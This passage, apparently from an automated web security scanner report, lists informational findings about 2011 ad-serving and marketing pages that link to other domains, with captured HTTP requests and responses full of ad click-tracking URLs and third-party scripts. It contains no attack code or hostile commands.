Path:   /TR1/iview/332867993/direct/01

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313290&click=http://ads.bluelithium.com/clk?3,eAGlUU2TmkAQ.TM5pYzzzcwuNYfBcVfEEUH8IJcUwi6KGFTYws2vDwmllXveoft1d.Xr6m5EbMYzCEWWQQIJT9-IjQgmb6mAqbUbQNu2CUFPFuZ4sPVWWk1Gc1c5F.e8Un.hxR9ez.7YQLn3oKvnSo-m1keX7TEz8F79P6-z6WNQNzDv1ZL2l7soXOehrVMWbwJmdNrONgH1ddyY6KU0I3Qw2qWzKKXfo-xoovVpjg2N20enHOyb5vwMQF5Wu6QcJtds-Jnsq2qYViewdF8lYpcDFO9PGBjJBReEDBEVEBLKO8I6YNQRxDnFHGhZn6trU4OlxMyyqMDs2YTjEfjxWTZSFWvrctzVae1fJ-GNxZ4fHyBkP-PUAbGM1cT3wXi7kIggRjCkQoCZrLfzIn.13MWYn1V4LqJy2BaBOZl9xpMjO71UuXLMRgFHwmYZBo2jw9PqG5j2Mt2bhWDQwhgDT8biQhtye9ftaJbrxW1ixus2AEpalFFEKAglBF-.3M.Sb.PPSX4D3Eql3w==, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAHCNIABqIpUAAAAAAKYuKAAAAAAAAAAQAIAAAAAAAAUAAgADCJ6uAQAAAAAAALM0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAPCruVfhPwAAAAAAAAAAAADwq7lX4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADd5E4gCvuuCmn8vdUdl6S1TDMb1u7FHz62Qp-OAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15qi08f92%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%2FB%3D0tSRQtBDRmU-%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%26_salt%3D1959032721%26cb%3D1315313288506222%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,79ad9070-d886-11e0-b028-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:10 GMT
Connection: close
Content-Length: 9393

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<div style="display: none">
<img src="http://testdm.travelers.com/trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993"/>
</div>
...[SNIP]...
<noscript>
<a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlUU2TmkAQ.TM5pYzzzcwuNYfBcVfEEUH8IJcUwi6KGFTYws2vDwmllXveoft1d.Xr6m5EbMYzCEWWQQIJT9-IjQgmb6mAqbUbQNu2CUFPFuZ4sPVWWk1Gc1c5F.e8Un.hxR9ez.7YQLn3oKvnSo-m1keX7TEz8F79P6-z6WNQNzDv1ZL2l7soXOehrVMWbwJmdNrONgH1ddyY6KU0I3Qw2qWzKKXfo-xoovVpjg2N20enHOyb5vwMQF5Wu6QcJtds-Jnsq2qYViewdF8lYpcDFO9PGBjJBReEDBEVEBLKO8I6YNQRxDnFHGhZn6trU4OlxMyyqMDs2YTjEfjxWTZSFWvrctzVae1fJ-GNxZ4fHyBkP-PUAbGM1cT3wXi7kIggRjCkQoCZrLfzIn.13MWYn1V4LqJy2BaBOZl9xpMjO71UuXLMRgFHwmYZBo2jw9PqG5j2Mt2bhWDQwhgDT8biQhtye9ftaJbrxW1ixus2AEpalFFEKAglBF-.3M.Sb.PPSX4D3Eql3w==,http://clk.atdmt.com/go/332867993/direct;ai.222372080;ct.1/01"><img border="0" src="HTTP://ec.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.jpg?ver=1" width="300" height="100" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

15.106. http://view.atdmt.com/TR1/iview/332867993/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAHCNIABqIpUAAAAAAArpJQAAAAAAAAAMAIAAAAAAAA0AAQADCJ6uAQAAAAAAKasxAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAIBYzSd4lD8AAMR19m7APwAAAAAAAAAAAADEdfZuwD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABTzbx8WfquCrkAQGF3mkTKtl2.WiYSu9rp2McYAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15q6ggjle%2FM%3D787833.14800347.14555521.14177427%2FD%3Dsports%2FS%3D25664825%3AMREC%2F_ylt%3DAjV6qkbscsOrHRx5YKOYi005nYcB%2FY%3DYAHOO%2FEXP%3D1315320305%2FL%3Dcopx_WKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL_z%2FB%3DY_rxAdBDRyg-%2FJ%3D1315313105713897%2FK%3Dr8awXcUkJHjbbi3QZybcoQ%2FA%3D6454134%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26S%3D14800347%26Z%3D300x100%26_PVID%3Dcopx%255fWKIPE7pARpjTl.wjQJ8Mhd7ak5mFdEACL%255fz%26_salt%3D678154096%26cb%3D1315313105713897%26i%3D140509%26r%3D0%26ycg%3D%26yyob%3D%26zip%3D,10a407f8-d886-11e0-8bc2-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:15 GMT
Connection: close
Content-Length: 9420

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<div style="display: none">
<img src="http://testdm.travelers.com/trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993"/>
</div>
...[SNIP]...
<noscript>
<a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw,http://clk.atdmt.com/go/332867993/direct;ai.222372080;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.jpg?ver=1" width="300" height="100" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

15.107. http://view.atdmt.com/TR1/iview/332867993/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /TR1/iview/332867993/direct/01

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /TR1/iview/332867993/direct/01?time=1315313294&click=http://ads.bluelithium.com/clk?3,eAGlUcFymzAQ.ZmeOi5CEhJyGB2EZTsyKAYbN1YvHQoEl0DBMRk7-frSMPbk3j3svt2dfTv7FmKPPhV5SrOcpqywKSk8iBEuMgYLF09sz.MwxIRhShid7IOdFEGVL4V.VN1OfFhgXoMR.fOxUNdk6JdCzlb0daiOFmr72v2.KPPVbdGwsBzZsourokr5N26ZEVMpxyBth4-xs5am18mi1jP42zQah0nm.EjyZ52Yi343xJxvk3xy6PvuDoCybn-ltZW-5NZbemhbK2sbsFVLDkkH02NJENDcZS7D2IKOw8h06g5gEJFhZDEy1FwKJD917Ut.AluOCKUOQ-ROqwiBn291z0VTovVC0WxV72pVNpKiBC9s8sdkPjDciPv1Gsz3EYcYEoxshzEQ8tP-oSqXgYrmbic2XZXU1rmKdaMPuZs-k2bRlsLXjwL4.D3fbuLel5tm9w2sRprhz4wRmyKEQMANOzo9vjzJ8ywsZXS51.Pv5xgIThFz3KkLNtwGX79cVRmv-aTIX9-bpp4=, HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?XKUDAKjdGABqIpUAAAAAAKYuKAAAAAAAAAAQAIAAAAAAAAUAAgADCJ6uAQAAAAAAALM0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADdJAIAAAAAAAIAAgAAAAAAAAB7Z0aGlD8AAOwCYJrhPwAAAAAAAAAAAADsAmCa4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkoZaPCvuuCiHSoGGlzAQsR4Xln-gZOQV-mtGzAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p1aqg52%2FM%3D787833.14485997.14323832.8514476%2FD%3Dsports%2FS%3D25664825%3AMIP2%2F_ylt%3DAmg2OFI6cJlUlIgmD62T3F05nYcB%2FY%3DYAHOO%2FEXP%3D1315320488%2FL%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%2FB%3DzdSRQtBDRmU-%2FJ%3D1315313288506222%2FK%3DY8q4t3xfDwCLgDPxHMEVwQ%2FA%3D6284797%2FR%3D0%2F%2A%24,http%3A%2F%2Fsports.yahoo.com%2F,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14485997%26Z%3D300x100%26_PVID%3DsXNjgGKIPE7pARpjTl.wjQMmMhd7ak5mFogABMWA%26_salt%3D2535976306%26cb%3D1315313288506222%26i%3D140509%26r%3D0,79b28cc4-d886-11e0-bbc7-78e7d161369c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:48:15 GMT
Connection: close
Content-Length: 9400

<html><head><title>multipolicy_300x100</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0px;"
...[SNIP]...
<div style="display: none">
<img src="http://testdm.travelers.com/trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993"/>
</div>
...[SNIP]...
<noscript>
<a target="_blank" href="http://ads.bluelithium.com/clk?3,eAGlUcFymzAQ.ZmeOi5CEhJyGB2EZTsyKAYbN1YvHQoEl0DBMRk7-frSMPbk3j3svt2dfTv7FmKPPhV5SrOcpqywKSk8iBEuMgYLF09sz.MwxIRhShid7IOdFEGVL4V.VN1OfFhgXoMR.fOxUNdk6JdCzlb0daiOFmr72v2.KPPVbdGwsBzZsourokr5N26ZEVMpxyBth4-xs5am18mi1jP42zQah0nm.EjyZ52Yi343xJxvk3xy6PvuDoCybn-ltZW-5NZbemhbK2sbsFVLDkkH02NJENDcZS7D2IKOw8h06g5gEJFhZDEy1FwKJD917Ut.AluOCKUOQ-ROqwiBn291z0VTovVC0WxV72pVNpKiBC9s8sdkPjDciPv1Gsz3EYcYEoxshzEQ8tP-oSqXgYrmbic2XZXU1rmKdaMPuZs-k2bRlsLXjwL4.D3fbuLel5tm9w2sRprhz4wRmyKEQMANOzo9vjzJ8ywsZXS51.Pv5xgIThFz3KkLNtwGX79cVRmv-aTIX9-bpp4=,http://clk.atdmt.com/go/332867993/direct;ai.222372080;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/TRATR11234001/300x100/multipolicy_300x100.jpg?ver=1" width="300" height="100" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=123400100201TR1&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1024038&sid=332867993&adid="></script><script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script361.js?agnc=1024037&cmp=1042775&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=332867993&advid=1043704&sid=332867993&adid="></script>
...[SNIP]...

15.108. http://view.atdmt.com/ULA/iview/351127232/direct/01

Summary

Severity:   Information
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /ULA/iview/351127232/direct/01

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /ULA/iview/351127232/direct/01?time=0.6476867063902318&click=http://global.ard.yahoo.com/SIG=15ofquilq/M=801389.14847586.14590575.8842099/D=movies/S=7820639:LREC/_ylt=ArDkTjjTVQQGSE3cO1ppKBlfVXcA/Y=YAHOO/EXP=1315320297/L=6231TkWTWyDpARpjTl.wjQVUMhd7ak5mFckABi.p/B=xJy5EGKJiRw-/J=1315313097544579/K=3q_Pgfb1tF9EF5Bt89NjSg/A=6481381/R=0/* HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:00 GMT
Connection: close
Content-Length: 8264

<html><head><title>300x250_BTBS_Dante_Yh1k</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin:0p
...[SNIP]...
<noscript>
<a target="_blank" href="http://global.ard.yahoo.com/SIG=15ofquilq/M=801389.14847586.14590575.8842099/D=movies/S=7820639:LREC/_ylt=ArDkTjjTVQQGSE3cO1ppKBlfVXcA/Y=YAHOO/EXP=1315320297/L=6231TkWTWyDpARpjTl.wjQVUMhd7ak5mFckABi.p/B=xJy5EGKJiRw-/J=1315313097544579/K=3q_Pgfb1tF9EF5Bt89NjSg/A=6481381/R=0/*http://clk.atdmt.com/go/351127232/direct;ai.235071350;ct.1/01"><img border="0" src="HTTP://spe.atdmt.com/ds/UXULASONYSPE/Bucky_Larson_Born_to_be_a_Star/300x250_Friday.jpg?ver=1" width="300" height="250" />
...[SNIP]...

15.109. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000766755/mnum=0000957105/cstr=73910453=_4e6615c4,4031732766,766755^957105^77^0,1_/xsxdata=$xsxdata/bnum=73910453/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:56 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Tue, 06-Mar-2012 13:44:56 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1755

<div id="theme180x150A01H1F0L1P0000V1_1Container"> <style type="text/css" media="screen">                                @import url(http://aranet.vo.llnwd.net/o28/themes/css/theme180x150A01H1F0L1P0000V1_1.css);                            </sty
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000766755/mnum=0000957105/cstr=73910453=_4e6615c4,4031732766,766755^957105^77^0,1_/xsxdata=$xsxdata/bnum=73910453/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3df03bf662-d78f-4004-8d86-f571fc57b7fd%26ArticleId%3d2965%26ComboId%3d15665%26title%3d-500K-life-insurance-no-exam-necessary%26origin%3d222842-APP15%26subid%3d0000766755%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/2965_326ac1ce-8a1c-4268-80da-2e5d7d9ecb3d.jpg" width="100" height="75"></a>
...[SNIP]...
<td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000766755/mnum=0000957105/cstr=73910453=_4e6615c4,4031732766,766755^957105^77^0,1_/xsxdata=$xsxdata/bnum=73910453/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3df03bf662-d78f-4004-8d86-f571fc57b7fd%26ArticleId%3d2965%26ComboId%3d15665%26title%3d-500K-life-insurance-no-exam-necessary%26origin%3d222842-APP15%26subid%3d0000766755%26segments%3d"><h4>
...[SNIP]...

15.110. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=f03bf662-d78f-4004-8d86-f571fc57b7fd&clickTag=http://r1-ads.ace.advertising.com/click/site=0000790042/mnum=0000957105/cstr=62371385=_4e6615c4,2458564453,790042^957105^77^0,1_/xsxdata=$xsxdata/bnum=62371385/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://uac.advertising.com/wrapper/aceUAC.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:53 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=5b1d53ac-cce1-43be-9dc6-ea715871af12; expires=Tue, 06-Mar-2012 13:44:53 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1755

<div id="theme180x150A01H1F0L1P0000V1_1Container"> <style type="text/css" media="screen">                                @import url(http://aranet.vo.llnwd.net/o28/themes/css/theme180x150A01H1F0L1P0000V1_1.css);                            </sty
...[SNIP]...
<td class="imageContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000790042/mnum=0000957105/cstr=62371385=_4e6615c4,2458564453,790042^957105^77^0,1_/xsxdata=$xsxdata/bnum=62371385/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3df03bf662-d78f-4004-8d86-f571fc57b7fd%26ArticleId%3d2965%26ComboId%3d15665%26title%3d-500K-life-insurance-no-exam-necessary%26origin%3d222840-APP14%26subid%3d0000790042%26segments%3d"><img class="size100x75" alt="" src="http://aranet.vo.llnwd.net/o28/resources/100x75/2965_326ac1ce-8a1c-4268-80da-2e5d7d9ecb3d.jpg" width="100" height="75"></a>
...[SNIP]...
<td class="textContainer"><a target="_Blank" href="http://r1-ads.ace.advertising.com/click/site=0000790042/mnum=0000957105/cstr=62371385=_4e6615c4,2458564453,790042^957105^77^0,1_/xsxdata=$xsxdata/bnum=62371385/optn=64?trg=http%3a%2f%2fwww.aralifestyle.com%2farticle.aspx%3fUserFeedGuid%3df03bf662-d78f-4004-8d86-f571fc57b7fd%26ArticleId%3d2965%26ComboId%3d15665%26title%3d-500K-life-insurance-no-exam-necessary%26origin%3d222840-APP14%26subid%3d0000790042%26segments%3d"><h4>
...[SNIP]...

15.111. http://www.aptela.com/lp2011/T2V1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!-- Google Website Optimizer Co
...[SNIP]...
</script>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://munchkin.marketo.net/js/munchkin.js"></script>
...[SNIP]...
</p>

   
<script src="http://thesearchagency.net/tsawaypoint.php?siteid=784&wayid=6025" language="JavaScript" type="text/javascript"></script>    

<SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1070493593/?label=CK09CJGgigIQmd-5_gM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

15.112. http://www.comcast.com/Corporate/Customers/contactus/ContactUs.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.comcast.com
Path:   /Corporate/Customers/contactus/ContactUs.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Corporate/Customers/contactus/ContactUs.html? HTTP/1.1
Host: www.comcast.com
Proxy-Connection: keep-alive
Referer: http://sitesearch.comcast.com/?q=internet+phone&cat=com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
